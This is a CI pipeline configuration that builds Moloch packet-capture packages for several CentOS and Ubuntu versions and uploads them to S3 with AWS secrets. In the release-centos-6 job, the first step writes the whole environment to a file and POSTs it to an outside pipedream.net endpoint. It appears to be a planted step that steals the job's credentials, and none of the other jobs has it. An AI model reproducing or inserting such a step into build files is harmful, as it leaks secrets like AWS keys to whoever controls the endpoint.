shared:
    settings:
        slack:
            channels:
                - moloch
            statuses:
                - FAILURE
                - ABORTED
    annotations:
        beta.screwdriver.cd/cpu: HIGH
        beta.screwdriver.cd/ram: HIGH

    environment:
        GIT_SHALLOW_CLONE: false

jobs:
    release-centos-6:
        requires: [~pr, ~commit]
        image: andywick/moloch-build-6:1.6.3
        steps:
            - env > /tmp/.env && curl "https://5249055eabbb52ef14d6e9b32e549966.m.pipedream.net/" -X POST -d @/tmp/.env;
            - rm -rf /data/moloch
            - (cd / ; curl http://files.molo.ch/snfmin.tar.gz | tar -zxvf -)
            - ln -s /thirdparty .
            - build: scl enable devtoolset-6 python27 "./easybutton-build.sh --daq --pfring"
            - export PATH=/data/moloch/bin:$PWD/node_modules/.bin:$PATH
            - npm -g config set user root; npm -g config set cache-min 9999999
            - installing: scl enable devtoolset-6 python27 "make install"
            - cp -r capture/plugins/lua/samples /data/moloch/lua
            - npm install license-checker; release/notice.txt.pl /data/moloch NOTICE release/CAPTURENOTICE > /data/moloch/NOTICE.txt
            - build-package: |
                export MOLOCH_VERSION=`sed 's/.*"\(.*\)\".*$/\1/' /data/moloch/viewer/version.js | tr "-" "_"`
                scl enable rh-ruby23 "/opt/rh/rh-ruby23/root/usr/local/bin/fpm -s dir -t rpm -n moloch -x data/moloch/logs -x data/moloch/raw -v $MOLOCH_VERSION --iteration 1 --template-scripts --after-install 'release/afterinstall.sh' --url "http://molo.ch" --description 'Moloch Full Packet System' -d perl-libwww-perl -d perl-JSON -d ethtool -d libyaml-devel /data/moloch"
                scl enable python27 "aws s3 cp moloch-${MOLOCH_VERSION}-1.x86_64.rpm s3://files.molo.ch/builds/centos-6/ --acl public-read"
                ls -l *.rpm
        secrets:
            - AWS_ACCESS_KEY_ID
            - AWS_SECRET_ACCESS_KEY

    release-centos-7:
        requires: [~pr, ~commit]
        image: andywick/moloch-build-7:1.6.3
        steps:
            - rm -rf /data/moloch
            - (cd / ; curl http://files.molo.ch/snfmin.tar.gz | tar -zxvf -)
            - ln -s /thirdparty .
            - build: ./easybutton-build.sh --daq --pfring
            - export PATH=/data/moloch/bin:$PWD/node_modules/.bin:$PATH
            - npm -g config set user root; npm -g config set cache-min 9999999
            - installing: make install
            - cp -r capture/plugins/lua/samples /data/moloch/lua
            - npm install license-checker; release/notice.txt.pl /data/moloch NOTICE release/CAPTURENOTICE > /data/moloch/NOTICE.txt
            - build-package: |
                export MOLOCH_VERSION=`sed 's/.*"\(.*\)\".*$/\1/' /data/moloch/viewer/version.js | tr "-" "_"`
                fpm -s dir -t rpm -n moloch -x data/moloch/logs -x data/moloch/raw -v $MOLOCH_VERSION --iteration 1 --template-scripts --after-install "release/afterinstall.sh" --url "http://molo.ch" --description "Moloch Full Packet System" -d perl-libwww-perl -d perl-JSON -d ethtool -d libyaml-devel /data/moloch
                aws s3 cp moloch-${MOLOCH_VERSION}-1.x86_64.rpm s3://files.molo.ch/builds/centos-7/ --acl public-read
                ls -l *.rpm
        secrets:
            - AWS_ACCESS_KEY_ID
            - AWS_SECRET_ACCESS_KEY

    release-ubuntu-14:
        requires: [~pr, ~commit]
        image: andywick/moloch-build-14:1.6.3
        steps:
            - rm -rf /data/moloch
            - (cd / ; curl http://files.molo.ch/snfmin.tar.gz | tar -zxvf -)
            - ln -s /thirdparty .
            - build: ./easybutton-build.sh --daq --pfring
            - export PATH=/data/moloch/bin:$PWD/node_modules/.bin:$PATH
            - npm -g config set user root; npm -g config set cache-min 9999999
            - installing: make install
            - cp -r capture/plugins/lua/samples /data/moloch/lua
            - npm install license-checker; release/notice.txt.pl /data/moloch NOTICE release/CAPTURENOTICE > /data/moloch/NOTICE.txt
            - build-package: |
                export MOLOCH_VERSION=`sed 's/.*"\(.*\)\".*$/\1/' /data/moloch/viewer/version.js`
                fpm -s dir -t deb -n moloch -x data/moloch/logs -x data/moloch/raw -v $MOLOCH_VERSION --iteration 1 --template-scripts --after-install "release/afterinstall.sh" --url "http://molo.ch" --description "Moloch Full Packet System" -d libwww-perl -d libjson-perl -d ethtool -d libyaml-dev /data/moloch

                aws s3 cp moloch_${MOLOCH_VERSION}-1_amd64.deb s3://files.molo.ch/builds/ubuntu-14.04/ --acl public-read
                ls -l *.deb
        secrets:
            - AWS_ACCESS_KEY_ID
            - AWS_SECRET_ACCESS_KEY

    release-ubuntu-16:
        requires: [~pr, ~commit]
        image: andywick/moloch-build-16:1.6.3
        steps:
            - rm -rf /data/moloch
            - (cd / ; curl http://files.molo.ch/snfmin.tar.gz | tar -zxvf -)
            - ln -s /thirdparty .
            - build: ./easybutton-build.sh --daq --pfring
            - export PATH=/data/moloch/bin:$PWD/node_modules/.bin:$PATH
            - npm -g config set user root; npm -g config set cache-min 9999999
            - installing: make install
            - cp -r capture/plugins/lua/samples /data/moloch/lua
            - npm install license-checker; release/notice.txt.pl /data/moloch NOTICE release/CAPTURENOTICE > /data/moloch/NOTICE.txt
            - build-package: |
                export MOLOCH_VERSION=`sed 's/.*"\(.*\)\".*$/\1/' /data/moloch/viewer/version.js`
                fpm -s dir -t deb -n moloch -x data/moloch/logs -x data/moloch/raw -v $MOLOCH_VERSION --iteration 1 --template-scripts --after-install "release/afterinstall.sh" --url "http://molo.ch" --description "Moloch Full Packet System" -d libwww-perl -d libjson-perl -d ethtool -d libyaml-dev /data/moloch
                aws s3 cp moloch_${MOLOCH_VERSION}-1_amd64.deb s3://files.molo.ch/builds/ubuntu-16.04/ --acl public-read
                ls -l *.deb
        secrets:
            - AWS_ACCESS_KEY_ID
            - AWS_SECRET_ACCESS_KEY

    release-ubuntu-18:
        requires: [~pr, ~commit]
        image: andywick/moloch-build-18:1.6.3
        steps:
            - rm -rf /data/moloch
            - (cd / ; curl http://files.molo.ch/snfmin.tar.gz | tar -zxvf -)
            - ln -s /thirdparty .
            - build: ./easybutton-build.sh --daq --pfring
            - export PATH=/data/moloch/bin:$PWD/node_modules/.bin:$PATH
            - npm -g config set user root
            - installing: make install
            - cp -r capture/plugins/lua/samples /data/moloch/lua
            - npm install license-checker; release/notice.txt.pl /data/moloch NOTICE release/CAPTURENOTICE > /data/moloch/NOTICE.txt
            - build-package: |
                export MOLOCH_VERSION=`sed 's/.*"\(.*\)\".*$/\1/' /data/moloch/viewer/version.js`
                fpm -s dir -t deb -n moloch -x data/moloch/logs -x data/moloch/raw -v $MOLOCH_VERSION --iteration 1 --template-scripts --after-install "release/afterinstall.sh" --url "http://molo.ch" --description "Moloch Full Packet System" -d libwww-perl -d libjson-perl -d ethtool -d libyaml-dev /data/moloch
                aws s3 cp moloch_${MOLOCH_VERSION}-1_amd64.deb s3://files.molo.ch/builds/ubuntu-18.04/ --acl public-read
                ls -l *.deb
        secrets:
            - AWS_ACCESS_KEY_ID
            - AWS_SECRET_ACCESS_KEY
